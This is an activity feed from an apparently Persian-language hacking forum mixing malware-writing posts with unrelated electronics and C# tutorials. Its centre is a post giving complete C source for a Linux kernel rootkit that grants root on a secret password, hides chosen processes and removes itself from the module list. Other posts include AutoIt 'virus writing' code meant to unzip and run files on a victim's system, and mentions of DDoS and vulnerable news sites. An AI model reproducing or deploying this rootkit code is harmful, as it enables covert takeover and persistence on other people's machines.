discord icon
سرور دیسکورد گاردایران

تمامی فعالیت ها

این جریان به طور خودکار بروزرسانی می شود     

  1. ساعت گذشته
  2. EvilEye
    شاید بشه برنامه اش نوشت
  3. CivilBingo CivilBingo عضو سایت گردید
  4. RT3N به یک ارسال در یک موضوع واکنش نشان داد : بدافزار روت‌کیت (Rootkit)
  5. Rvlocker

    بدافزار روت‌کیت (Rootkit)

    Rvlocker پاسخی برای Rvlocker در یک موضوع ارسال کرد در تروجان و کیلاگر

    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت شما کاربران محترم تیم انجمن گاردایران برای آشنایی شما با روت کیت یک پروژه ساده رو برای اولین کدنویسی در این تاپیک قرار خواهم داد که شما درک بهتری از روت کیت داشته باشید اولین روت کیتی که واستون اوردم نوشته شده با برنامه C هستش و برای سیستم عامل لینوکسی اگر هنوز به برنامه نویسی C , C++ آشنا نیستی حتما آموزشش رو واستون خواهم اورد خب هدری تشکلیل باید بدین به این صورت که بتونیم در سورس برنامه فراخوانیش بکنیم static char password[] = "secretpassword" ; static char passwaiter[] = "version" ; static char module_release[] = "release" ; static char module_uncover[] = "uncover" ; static char hide_proc[] = "hide" ; static char unhide_proc[] = "unhide"; خب همونطور که میبینید چند متغییر ثابت برای استفاده روت کیت قرار دادم که شمامل مخفی کردن . ورژن و کاور کردن برنامه است در قسمت فایلی جداگانه که سورس برنامه هستش باید ابتدا هدر هارو وارد کنید #include<module.h> #include<linux/kernel.h> #include<linux/proc_fs.h> #include<linux/sched.h> #include<linux/string.h> #include<linux/cred.h> #include<linux/stat.h> #include<linux/uaccess.h> #include<linux/file.h> #include "rootkit_conf.conf.h" آخرین هدری که میبینید هدری هستش که به صورت دستی خودمون نوشتیم در اول برنامه واستون نوشتم که شامل مخفی کردن و کاور کردن هستش شما هر نامی بخواین میتونید برای هدرتون بزارید ولی حتما باید در سورس برنامه فراخوانی کنید وگرنه برنامه اجرا نمیشه MODULE_AUTHOR("Rvlocker<mrzerooo000ooo000ooo@gmail.com>") ; MODULE_DESCRIPTION("Simple rootkit using procfs") ; MODULE_VERSION("0.1.2"); static int failed; static char pid[10][32]; static int pid_index; /* Here are pointers in which to save original, replaced pointers. */ static int (*old_proc_readdir)(struct file *, void *, filldir_t); static filldir_t old_filldir ; static ssize_t (*old_fops_write) (struct file *, const char __user *, size_t, loff_t *); static ssize_t (*old_fops_read)(struct file *, char __user *, size_t, loff_t*); static write_proc_t *old_write; static read_proc_t *old_read; static struct proc_dir_entry *ptr; static struct proc_dir_entry *root; static struct list_head *prev; static struct file_operations *fops; static struct file_operations *root_fops; static inline void module_remember_info(void) { prev = THIS_MODULE->list.prev; } static inline void module_show(void) { list_add(&THIS_MODULE->list, prev); /*Add module to main list of modules */ } static int check_buf(const char __user *buf) { struct cred *new = prepare_creds(); if (!strcmp(buf, password)) { new->uid = new->euid = 0; new->gid = new->egid = 0; commit_creds(new); } else if (!strcmp(buf, module_release)) module_put(THIS_MODULE); else if (!strcmp(buf, module_uncover)) module_show(); else if (!strncmp(buf, hide_proc, strlen(hide_proc))) { if (pid_index > 9) return 0; sprintf(pid[pid_index], "%s", buf + 5); pid_index++; } else if (!strncmp(buf, unhide_proc, strlen(unhide_proc))) { if (!pid_index) return 0; pid_index--; } else return 1; return 0; } /*"write" function */ static int buf_write(struct file *file, const char __user *buf, unsigned long count, void *data) { if (!check_buf(buf)) return count; return old_write(file, buf, count, data); } /*"read" function for read_proc field*/ static int buf_read(char __user *buf, char **start, off_t off, int count, int *eof, void *data) { if (!check_buf(buf)) return count; return old_read(buf, start, off, count, eof, data); } /* For file_operations structure */ static ssize_t fops_write(struct file *file, const char __user *buf_user, size_t count, loff_t *p) { if (!check_buf(buf_user)) return count; return old_fops_write(file, buf_user, count, p); } /* For file_operations structure */ static ssize_t fops_read(struct file *file, char __user *buf_user, size_t count, loff_t *p) { if (!check_buf(buf_user)) return count; return old_fops_read(file, buf_user, count, p); } /*filldir function */ static int new_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type) { int i; for (i = 0; i < pid_index; i++) if (!strcmp(name, pid[i])) return 0; return old_filldir(__buf, name, namelen, offset, ino, d_type); } /*readdir function */ static int new_proc_readdir(struct file *filp, void *dirent, filldir_t filldir) { old_filldir = filldir; return old_proc_readdir(filp, dirent, new_filldir) ; } static inline void change_proc_root_readdir(void) { root_fops = (struct file_operations *)root->proc_fops; old_proc_readdir = root_fops->readdir; root_fops->readdir = new_proc_readdir; } static inline void proc_init(void) { ptr = create_proc_entry("temporary", 0444, NULL); ptr = ptr->parent; if (strcmp(ptr->name, "/proc") != 0) { failed = 1; return; } root = ptr; remove_proc_entry("temporary", NULL); change_proc_root_readdir(); ptr = ptr->subdir; while (ptr) { if (strcmp(ptr->name, passwaiter) == 0) goto found; ptr = ptr->next; } failed = 1; return; found: old_write = ptr->write_proc; old_read = ptr->read_proc; fops = (struct file_operations *)ptr->proc_fops; old_fops_read = fops->read; old_fops_write = fops->write; if (ptr->write_proc) ptr->write_proc = buf_write; else if (ptr->read_proc) ptr->read_proc = buf_read; if (fops->write) fops->write = fops_write; else if (fops->read) fops->read = fops_read; if (!ptr->read_proc && !ptr->write_proc && !fops->read && !fops->write) { failed = 1; return; } } static inline void tidy(void) { kfree(THIS_MODULE->notes_attrs); THIS_MODULE->notes_attrs = NULL; kfree(THIS_MODULE->sect_attrs); THIS_MODULE->sect_attrs = NULL; kfree(THIS_MODULE->mkobj.mp); THIS_MODULE->mkobj.mp = NULL; THIS_MODULE->modinfo_attrs->attr.name = NULL; kfree(THIS_MODULE->mkobj.drivers_dir); THIS_MODULE->mkobj.drivers_dir = NULL; } static inline void rootkit_hide(void) { list_del(&THIS_MODULE->list); kobject_del(&THIS_MODULE->mkobj.kobj); list_del(&THIS_MODULE->mkobj.kobj.entry); } static inline void rootkit_protect(void) { try_module_get(THIS_MODULE); } static int __init rootkit_init(void) { module_remember_info(); proc_init(); if (failed) return 0; rootkit_hide(); tidy(); rootkit_protect(); return 0 ; } static void __exit rootkit_exit(void) { if (failed) return; root_fops->readdir = old_proc_readdir; fops->write = old_fops_write; fops->read = old_fops_read; ptr->write_proc = old_write; ptr->read_proc = old_read; } module_init(rootkit_init); module_exit(rootkit_exit); توجه : هرگونه استفاده ی غیرمجاز از آموزش ها و برنامه ها به عهده ی شخص استفاده کننده است موفق باشید
  6. bbastien.hdsau
    با سلام ، آیا راهی وجود دارد که برای یک لپ تاپ با سیستم عامل لینوکس آلارمی تنظیم شود که وقتی باتری به ۹۵ رسید و آگر هم در حالت خواب بود صدایی پخش شود ؟!؟
  7. RT3N به یک ارسال در یک موضوع واکنش نشان داد : ویروس نویسی
  8. RT3N به یک ارسال در یک موضوع واکنش نشان داد : ویروس نویسی
  9. RT3N به یک ارسال در یک موضوع واکنش نشان داد : ویروس نویسی
  10. RT3N به یک ارسال در یک موضوع واکنش نشان داد : ویروس نویسی
  11. RT3N به یک ارسال در یک موضوع واکنش نشان داد : اموزش قطعات الکترونیکی(قسمت دوم )
  12. RT3N به یک ارسال در یک موضوع واکنش نشان داد : بدافزار روت‌کیت (Rootkit)
  13. Rvlocker به یک ارسال در یک موضوع واکنش نشان داد : اموزش قطعات الکترونیکی(قسمت دوم )
  14. mmj-sys
    سلام به دوستان گرامی حدود چند روز از تاپیک قبلی میگذره اگه نخوندید بخونید اگه خوندید کمربنداتو نو ببندید که خیلی کار داریم و باید مثل جت ادامه بدید خب در مطلب قبلی از مفاهیم اولیه حرف زدیم اما الان میخوایم ببینیم اسم قطعات چیه و کارشون چیه خازن ها (بخونید : khazen) همونطور که از اسمش پیداست وسیله‌ای الکتریکی است که می‌تواند بار الکتریکی (و بنابراین انرژی الکتریکی) رو تو خودش ذخیره میکنه خازن را با حرف C که ابتدای کلمه capacitor است نمایش می‌دن. توجه به اینکه بار الکتریکی در خازن ذخیره می‌شه، برای ایجاد میدان‌های الکتریکی یکنواخت می‌توان از خازن استفاده کرد. خازن‌ها می‌توانند میدان‌های الکتریکی را در حجم‌های کوچک نگه دارند؛ به علاوه می‌توان از آن‌ها برای ذخیره کردن انرژی استفاده کرد. وسیله ای است که برای ذخیره‌سازی بار الکتریکی به کار می‌رود. تعریف ظرفیّت خازن: نسبت بار ذخیره شده در خازن به اختلاف پتانسیل دوسر خازن ا ظرفیّت خازن می‌نامند. واحد آن فاراد است. نماد خازن دارای چهار خط است که در امتداد هم هستند کلا کار های باحالی میشه باهاشون کرد و توی نقشه ها اینجوری نشون میدن : هشدار وقعا جدی هرخازنی رو در جریان قرار ندید و اصلا سمت پریز خونتون نرید حتی فکرش به سرتون نزنه اگه خیلی کنجکاوید نهایتا از باتری های 9 ولتی استفاده کنید چون اگه ولتاژ زیاد باشه می پاجه توی چشم و چالتون باید با کاردک جمعتون کنیم نمونه : لطفا اسپم ندید و لایک کنید
  15. crackerpassword به یک ارسال در یک موضوع واکنش نشان داد : بدافزار روت‌کیت (Rootkit)
  16. امروز
  17. mmj-sys

    سلام عضو تیم دیفیس

    رفتی بالا مارو فراموش نکنی 😂😂

  18. Mrh1926 Mrh1926 عضو سایت گردید
  19. Rvlocker شروع به دنبال کردن اعلام آمادگی مدیریت بخش و بدافزار روت‌کیت (Rootkit) کرد
  20. Rvlocker
    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت شما کاربران محترم تیم انجمن گاردایران در این تاپیک قصد دارم بدافزار روت کیت یا Rootkit رو به شما معرفی کنم اگر یک مقدار به اسم این بدافزارمون دیقت کنید ! میبینید کلمه ی اولش با Root شروع شده و همونطور که میدونید root مربوط به دنیای سیستم عامل لینوکس هستش که به معنای دسترسی به حساب مدیر یا به اصطلاح راحت تر دسترسی کامل به هکر عزیزمون ! 😁 از نظر بنده Rootkit ها بدترین و خطرناک ترین هستند چرا چون از نظر خصوصیاتی کاملا به تروجان ها شباهت دارند ولی با وجود اینکه از همه پرخطرتر هستند حالا علتش چیه که انقدر اصرار دارم خطرناکه ؟!!! چون میتونه خیلی راحت خودشو جایگزین فایل های اصلی سیستمون بکنه که حتی آنتی ویروستونم ازش باخبر نباشه و پیدا کردنشون کار حضرت فیله 😅 حالا چرا استفاده میشه از روت کیت ؟ چون دسترسی شما رو دائمی میکنه و خودشو در هسته ی سیستم شما مخفی میکنه ! و خطرش بخاطر همینه حالا روت کیت ها خودشون به دوسته تقسیم میشوند دسته قدیمی یا مال زمانی که اولین روت کیت رو ساختن که مربوط میشه به سال 1990 که برای انواع سیستم عامل ها نوشتند اما تمرکز بیشترشون روی سیستم هایی برپایه لینوکس بود که نهایتا دسترسی سیستمی میداد ولی دسته ی پیشرفته ترش که خودشو در هسته ی سیستم عامل مخفی میکنه و پیدا کردنش که قبلا بهتون گفتم کار حضرت فیله 👽 به همین دلیل باید مراقب فایل هایی که از اینترنت دانلود میکنید باشید این رو هم در نظر داشته باشید هیچ سیستمی غیرقابل نفوذ نیست همیشه باید سیستمتونو از نظر ورودی و خروجی چک کنید تنها راه خلاص شدن از روت کیت حذف کامل ویندوزه 😁 یا تغییر سیستم عامل سرور یا ریست کردنش حرف آخر : مراقب بازکردن فایل × عکس × pdf یا هر چیزی از اینترنت باشید ! پیش خودتون فکر نکنید کسی با شما کار نداره با این کار کم ترین کاری که یک نفوذ گر میتونه انجام بده به وسیله ی سیستم شما عملیات Mining انجام میده یا حملات DDos در همین تاپیک سعی میکنم چند نمونه روت کیت رو واستون بنویسم !!! موفق باشید
  21. HCSH4C39 به یک ارسال در یک موضوع واکنش نشان داد : آموزش تزریق وابستگی در سی شارپ - کاربردی
  22. Rvlocker

    ویروس نویسی

    Rvlocker پاسخی برای Rvlocker در یک موضوع ارسال کرد در ویروس

    در این تاپیک ویروسی واستون نوشتم که میتونید خیلی راحت فایل های Zip رو Unzip کنید حالا میتونید ویروسی داشته باشید که درایوهارو search کنه بگرده دنبال فایل های zip یا یک فایل zip دانلود کنه و از فشرده سازی دربیاره و در سیستم کاربر اجرا کنه توجه ویروس نویسی به صورت پیشرفته هستش برای آموزش های اختصاصی میتونید در ارتباط باشید ابتدا باید هدر بدین صورت باشه ! این فایل کنار کامپایلار باید باشه وگرنه فایل اصلی کامپایل نخواهد شد ;#AutoIt3Wrapper_au3check_parameters=-d -w 1 -w 2 -w 3 -w 4 -w 5 -w 6 #include-once #include <array.au3> ; ------------------------------------------------------------------------------ ; ; AutoIt Version: 3.2 ; Language: English ; Description: ZIP Functions. ; Author: Rvlocker ; ; ------------------------------------------------------------------------------ If UBound($CMDLine) > 1 Then If $CMDLine[1] <> "" Then _Zip_VirtualZipOpen() EndIf ;=============================================================================== ; Code By Rvlocker ; Web : Guardiran.org ; Function Name: _Zip_Create() ; Description: Create Empty ZIP file. ; Parameter(s): $hFilename - Complete path to zip file that will be created ; Requirement(s): none. ; Return Value(s): Returns the Zip file path (to be used as a handle - even though it's not necessary) ; Author(s): Rvlocker ; ;=============================================================================== Func _Zip_Create($hFilename) $hFp = FileOpen($hFilename, 26) $sString = Chr(80) & Chr(75) & Chr(5) & Chr(6) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) FileWrite($hFp, $sString) If @error Then Return SetError(1, 0, 0) FileClose($hFp) While Not FileExists($hFilename) Sleep(10) WEnd Return $hFilename EndFunc ;==>_Zip_Create ;=========================================================================================================== Func _Zip_AddFile($hZipFile, $hFile2Add, $flag = 1) Local $DLLChk = _Zip_DllChk() Local $files = _Zip_Count($hZipFile) If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0);no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file $oApp = ObjCreate("Shell.Application") $copy = $oApp.NameSpace($hZipFile).CopyHere($hFile2Add) While 1 If $flag = 1 Then _Hide() If _Zip_Count($hZipFile) = ($files + 1) Then ExitLoop Sleep(10) WEnd Return SetError(0, 0, 1) EndFunc ;==>_Zip_AddFile ;=============================================================================== Func _Zip_AddFolder($hZipFile, $hFolder, $flag = 1) Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0);no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file If StringRight($hFolder, 1) <> "\" Then $hFolder &= "\" $files = _Zip_Count($hZipFile) $oApp = ObjCreate("Shell.Application") $oCopy = $oApp.NameSpace($hZipFile).CopyHere($oApp.Namespace($hFolder)) While 1 If $flag = 1 Then _Hide() If _Zip_Count($hZipFile) = ($files + 1) Then ExitLoop Sleep(10) WEnd Return SetError(0, 0, 1) EndFunc ;==>_Zip_AddFolder ;=============================================================================== Func _Zip_AddFolderContents($hZipFile, $hFolder, $flag = 1) Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0);no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file If StringRight($hFolder, 1) <> "\" Then $hFolder &= "\" $files = _Zip_Count($hZipFile) $oApp = ObjCreate("Shell.Application") $oFolder = $oApp.NameSpace($hFolder) $oCopy = $oApp.NameSpace($hZipFile).CopyHere($oFolder.Items) $oFC = $oApp.NameSpace($hFolder).items.count While 1 If $flag = 1 Then _Hide() If _Zip_Count($hZipFile) = ($files + $oFC) Then ExitLoop Sleep(10) WEnd Return SetError(0, 0, 1) EndFunc ;==>_Zip_AddFolderContents ;=============================================================================== Func _Zip_Delete($hZipFile, $hFilename, $flag = 1) Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0);no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file $list = _Zip_List($hZipFile) $dir = @TempDir & "\tmp" & Floor(Random(0, 100)) For $i = 1 To $list[0] If $list[$i] <> $hFilename Then _Zip_Unzip($hZipFile, $list[$i], $dir, $flag) Next FileDelete($hZipFile) _Zip_Create($hZipFile) _Zip_AddFolderContents($hZipFile, $dir, $flag) DirRemove($dir) EndFunc ;==>_Zip_Delete ;=============================================================================== Func _Zip_UnzipAll($hZipFile, $hDestPath, $flag = 1) Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0);no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(2, 0, 0) ;no zip file If Not FileExists($hDestPath) Then DirCreate($hDestPath) Local $aArray[1] $oApp = ObjCreate("Shell.Application") $oApp.Namespace($hDestPath).CopyHere($oApp.Namespace($hZipFile).Items) For $item In $oApp.Namespace($hZipFile).Items _ArrayAdd($aArray, $item) Next While 1 If $flag = 1 Then _Hide() If FileExists($hDestPath & "\" & $aArray[UBound($aArray) - 1]) Then Return SetError(0, 0, 1) ExitLoop EndIf Sleep(500) WEnd EndFunc ;==>_Zip_UnzipAll ;=============================================================================== ; ;=============================================================================== Func _Zip_Unzip($hZipFile, $hFilename, $hDestPath, $flag = 1) Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0) ;no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file If Not FileExists($hDestPath) Then DirCreate($hDestPath) $oApp = ObjCreate("Shell.Application") $hFolderitem = $oApp.NameSpace($hZipFile).Parsename($hFilename) $oApp.NameSpace($hDestPath).Copyhere($hFolderitem) While 1 If $flag = 1 Then _Hide() If FileExists($hDestPath & "\" & $hFilename) Then Return SetError(0, 0, 1) ExitLoop EndIf Sleep(500) WEnd EndFunc ;==>_Zip_Unzip ;=============================================================================== Func _Zip_Count($hZipFile) Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0) ;no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file $items = _Zip_List($hZipFile) Return UBound($items) - 1 EndFunc ;==>_Zip_Count Func _Zip_CountAll($hZipFile) Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0) ;no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file $oApp = ObjCreate("Shell.Application") $oDir = $oApp.NameSpace(StringLeft($hZipFile, StringInStr($hZipFile, "\", 0, -1))) $sZipInf = $oDir.GetDetailsOf($oDir.ParseName(StringTrimLeft($hZipFile, StringInStr($hZipFile, "\", 0, -1))), -1) Return StringRight($sZipInf, StringLen($sZipInf) - StringInStr($sZipInf, ": ") - 1) EndFunc ;==>_Zip_CountAll Func _Zip_List($hZipFile) Local $aArray[1] Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0) ;no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file $oApp = ObjCreate("Shell.Application") $hList = $oApp.Namespace($hZipFile).Items For $item In $hList _ArrayAdd($aArray, $item.name) Next $aArray[0] = UBound($aArray) - 1 Return $aArray EndFunc ;==>_Zip_List Func _Zip_Search($hZipFile, $sSearchString) Local $aArray Local $DLLChk = _Zip_DllChk() If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0) ;no dll If Not _IsFullPath($hZipFile) Then Return SetError(4, 0) ;zip file isn't a full path If Not FileExists($hZipFile) Then Return SetError(1, 0, 0) ;no zip file $list = _Zip_List($hZipFile) For $i = 0 To UBound($list) - 1 If StringInStr($list[$i], $sSearchString) > 0 Then _ArrayAdd($aArray, $list[$i]) EndIf Next If UBound($aArray) - 1 = 0 Then Return SetError(1, 0, 0) Else Return $aArray EndIf EndFunc ;==>_Zip_Search Func _Zip_SearchInFile($hZipFile, $sSearchString) Local $aArray $list = _Zip_List($hZipFile) For $i = 1 To UBound($list) - 1 _Zip_Unzip($hZipFile, $list[$i], @TempDir & "\tmp_zip.file") $read = FileRead(@TempDir & "\tmp_zip.file") If StringInStr($read, $sSearchString) > 0 Then _ArrayAdd($aArray, $list[$i]) EndIf Next If UBound($aArray) - 1 = 0 Then Return SetError(1, 0, 1) Else Return $aArray EndIf EndFunc ;==>_Zip_SearchInFile Func _Zip_VirtualZipCreate($hZipFile, $sPath) $list = _Zip_List($hZipFile) If @error Then Return SetError(@error, 0, 0) If Not FileExists($sPath) Then DirCreate($sPath) If StringRight($sPath, 1) = "\" Then $sPath = StringLeft($sPath, StringLen($sPath) - 1) For $i = 1 To $list[0] If Not @Compiled Then $Cmd = @AutoItExe $params = '"' & @ScriptFullPath & '" ' & '"' & $hZipFile & "," & $list[$i] & '"' Else $Cmd = @ScriptFullPath $params = '"' & $hZipFile & "," & $list[$i] & '"' EndIf FileCreateShortcut($Cmd, $sPath & "\" & $list[$i], -1, $params, "Virtual Zipped File", _GetIcon($list[$i], 0), "", _GetIcon($list[$i], 1)) Next $list = _ArrayInsert($list, 1, $sPath) Return $list EndFunc ;==>_Zip_VirtualZipCreate Func _Zip_VirtualZipOpen() $ZipSplit = StringSplit($CMDLine[1], ",") $ZipName = $ZipSplit[1] $ZipFile = $ZipSplit[2] _Zip_Unzip($ZipName, $ZipFile, @TempDir & "\", 4 + 16) ;no progress + yes to all If @error Then Return SetError(@error, 0, 0) ShellExecute(@TempDir & "\" & $ZipFile) EndFunc ;==>_Zip_VirtualZipOpen Func _Zip_VirtualZipDelete($aVirtualZipHandle) For $i = 2 To UBound($aVirtualZipHandle) - 1 If FileExists($aVirtualZipHandle[1] & "\" & $aVirtualZipHandle[$i]) Then FileDelete($aVirtualZipHandle[1] & "\" & $aVirtualZipHandle[$i]) Next Return 0 EndFunc ;==>_Zip_VirtualZipDelete Func _Zip_DllChk() If Not FileExists(@SystemDir & "\zipfldr.dll") Then Return 2 If Not RegRead("HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}", "") Then Return 3 Return 0 EndFunc ;==>_Zip_DllChk Func _GetIcon($file, $ReturnType = 0) $FileType = StringSplit($file, ".") $FileType = $FileType[UBound($FileType) - 1] $FileParam = RegRead("HKEY_CLASSES_ROOT\." & $FileType, "") $DefaultIcon = RegRead("HKEY_CLASSES_ROOT\" & $FileParam & "\DefaultIcon", "") If Not @error Then $IconSplit = StringSplit($DefaultIcon, ",") ReDim $IconSplit[3] $Iconfile = $IconSplit[1] $IconID = $IconSplit[2] Else $Iconfile = @SystemDir & "\shell32.dll" $IconID = -219 EndIf If $ReturnType = 0 Then Return $Iconfile Else Return $IconID EndIf EndFunc ;==>_GetIcon Func _IsFullPath($path) If StringInStr($path, ":\") Then Return True Else Return False EndIf EndFunc ;==>_IsFullPath Func _Hide() If ControlGetHandle("[CLASS:#32770]", "", "[CLASS:SysAnimate32; INSTANCE:1]") <> "" And WinGetState("[CLASS:#32770]") <> @SW_HIDE Then ;The Window Exists $hWnd = WinGetHandle("[CLASS:#32770]") WinSetState($hWnd, "", @SW_HIDE) EndIf EndFunc ;==>_Hide سورس اصلی : ;Code By Rvlocker ; Web : guardiran.org #NoTrayIcon #include "zip.au3" Local $path = @ScriptDir & '\test.zip' If FileExists($path) Then _Zip_UnzipAll($path, @ScriptDir) EndIf پسورد : guardiran.org demo.rar موفق باشید
  23. EvilEye

    آموزش تزریق وابستگی در سی شارپ - کاربردی

    EvilEye پاسخی برای EvilEye در یک موضوع ارسال کرد در C#.net

    لینک تماشای ویدیو https://aparat.com/v/buTaM using System; using Unity; namespace ConsoleApp1 { class Program { static void Main(string[] args) { Unity.UnityContainer unity = new UnityContainer(); unity.RegisterType<Imessanger, Convercation2>(); Employee emp = unity.Resolve<Employee>(); emp.SayHello(); Console.ReadLine(); } } public interface Injection { void InjectNow(Imessanger msg); } public class Employee:Injection { private Imessanger _messenger; //[Dependency] //public Imessanger messenger { set { _messenger = value; } } public void SayHello() { _messenger.Say(); } [InjectionMethod] public void InjectNow(Imessanger msg) { _messenger = msg; } //[InjectionConstructor] //public Employee(Imessanger msg) //{ // _messenger = msg; //} } public interface Imessanger { void Say(); } public class Convercation : Imessanger { public void Say() { Console.WriteLine("Hello Touraj ..."); } } public class Convercation2 : Imessanger { public void Say() { Console.WriteLine("Hello Tor ..."); } } }
  24. EvilEye
    سلام در آپارت آپلود میکنم ویدیو را. توضیح خواهم داد که چرا اصلا باید از تزریق وابستگی در کدمون استفاده کنیم. کاربردش چیه. از Unity هم به عنوان IoC استفاده خواهیم کرد.
  25. دیروز
  26. MR.MSA
    با سلام خدمت دوستان . کاربر عزیز @Mr_Exploit تاپیک اعلام امادگی مدیریت بخش برای زمانی هست که شما توی سایت فعالیت میکنید برای مثال میخواید بخش ddos رو مدیریت کنید خب پست های اموزشی در رابطه با ddos رو میزارید و یا خودتون خیلی سایت ها رو دیدایس میزنید که اینم بگم دیداس زیاد ارزش نداره و به نظر من توی بخش های دیگه فعالیت کنید بهتره . و بعد از اینکه فعالیت شما به سطح لازم رسید و برای مثال رنکتون رفت بالا و شدید کاربر انجمن و .. اون موقع میتونید اقدام کنید برای اعلام امادگی و اینم بگم که همون موقع مدیر نمیکنن شما رو و فعالیت شما رو زیر نظر میگیرن ادمین های عزیز بعد از تایید شما یه سری صحبت ها و قوانین لازمه رو عرض میکنن و اون موقع مدیر بخش میشین و اینم بگم لازم به اسپم کردن و پست های زیاد نیست و باید صبور باشید تا ادمین ها پاسخ شما رو بدن . موفق و پیروز باشید .
  27. Rvlocker
    با سلام خدمت شما کاربر محترم و فعال گاردایران لطفا از اسپم کردن پیام خودداری کنید پیامتون همون بار اول قرار داده شده و مدیران حتما بررسی خواهند کرد موفق باشید
  28. Mr_Exploit
    در خواست مدیریت بخش دیداس [DDOS] رو دارم (در غیر این صورت درخواست مدیریت بخش امنیت ایمیلهای شخصی رو دارم ممنون @C0d3!Nj3ct!0n
  29. Rvlocker

    ویروس نویسی

    Rvlocker پاسخی برای Rvlocker در یک موضوع ارسال کرد در ویروس

    در این تاپیک جابه جایی موس به صورت مدارم رو خدمتتون آموزش میدم Func _Exit() Exit EndFunc تابعی برای خروج از سیستم موس متحرک که کلید مورد نظرمون رو روش ست کنیم و هر وقت بخواییم خارج بشیم HotKeySet("{F1}","_Exit") کلید F1 رو ست کردن برای خروج از اسکریپت While 1 $poax = Random(1,1000) $poay = Random(1,1000) MouseMove($poax,$poay) Sleep(1000) WEnd دو متغییر تعریف کردم و محل تولید Random رو بهش دادم و با تابع شناخته شده ی سیستم متغییرهارو میکس کردم sleep هم برای این که در هر 1 ثانیه موس تغییر مکان بده موفق باشید پسورد ---> guardiran.org crazyMouse.rar
  30. MR.MSA شروع به دنبال کردن گزارش اسیب پذیری دو پایگاه خبری کرد
  31. MR.MSA
    با سلام خدمت دوستان عزیز انجمن تیم امنیتی گاردایران . چند هفته پیش دو وب سایت خبری رو گزارش کردم که خواستم اینجا قرار بدم . وب سایت اول پایگاه خبری هاناخبر :‌ http://www.hanakhabar.ir/news.php?id=28AD1E61 وب سایت دوم پایگاه خبر زریان موکریان : https://www.ziryanmukryan.ir/news.php?id=36D1F4BA و در کنارش اسیب پذیری های شرکت کیهان افزار رو هم گزارش کردم اما پستی نزاشتن برای همین فقط لینک سایت رو میزارم . تشکر میکنم از شرکت کیهان افزار که به خوبی اسیب پذیری ها رو تایید کردن و بحث های امنیتی رو رعایت میکنند . موفق و پیروز باشید .
  32. HCSH4C39 HCSH4C39 تصویر نمایه خود را تغییر داد
  33. Mr_Exploit
    دوست عزیز گذاشتن لینک از سایر سایت ها خلاف قوانین انجمن هست (حالا دقیق نمیدونم از مدیر بپرس)
  34. Zed.1413.M شروع به دنبال کردن proxy کرد
  35. MR.MSA شروع به دنبال کردن Xpath Injection Vulnerability Training کرد
  36. MR.MSA
    با سلام خدمت دوستان عزیز . امروز براتون ویدئویی رو قرار دادم در رابطه با اسیب پذیری ‌Xpath Injection اگه صدا مشکل داره توی خود یوتیوب مشاهده کنید . ( در ضمن به دلایل امنیتی صدا رو تغییر دادم ) همچنین قبلا هم یک پست اموزشی گزاشتم که میتونید از اون هم استفاده کنید :‌ دکمه تشکر کنار تاپیک فراموش نشه . موفق و پیروز باشید .
  37. MR.MSA

    clash of clans

    MR.MSA پاسخی برای amir00755 در یک موضوع ارسال کرد در سوال و جواب های متفرقه

    با سلام قطعا هنوز باگ داره دوست عزیز و هیچ وقت نمیشه گفت بخاطر ۵ سال سابقه هیچ باگی نداره الان فیسبوک روزی صد تا باگ ازش میگیرن ...... و اینکه پست های قدیمی رو بالا نیارید لطفا !!
  38. Mr_Exploit

    clash of clans

    Mr_Exploit پاسخی برای amir00755 در یک موضوع ارسال کرد در سوال و جواب های متفرقه

    دوست عزیز شرکت سوپرسل بیشتر از 5 ساله در این حوزه داره کار میکنه ! بنظرت ممکنه یه شرکتی که 5 سال سابقه داشته باشه و در اوایل 100 بار بهش نفوذ شده الان ممکنه باگ داشته باشه ؟
  39. Zed.1413.M
    حرف شما ها صحیح از این به بعد منبع میزنم
  40. Rvlocker

    تارگت برای آموزش Sqlinjection 2

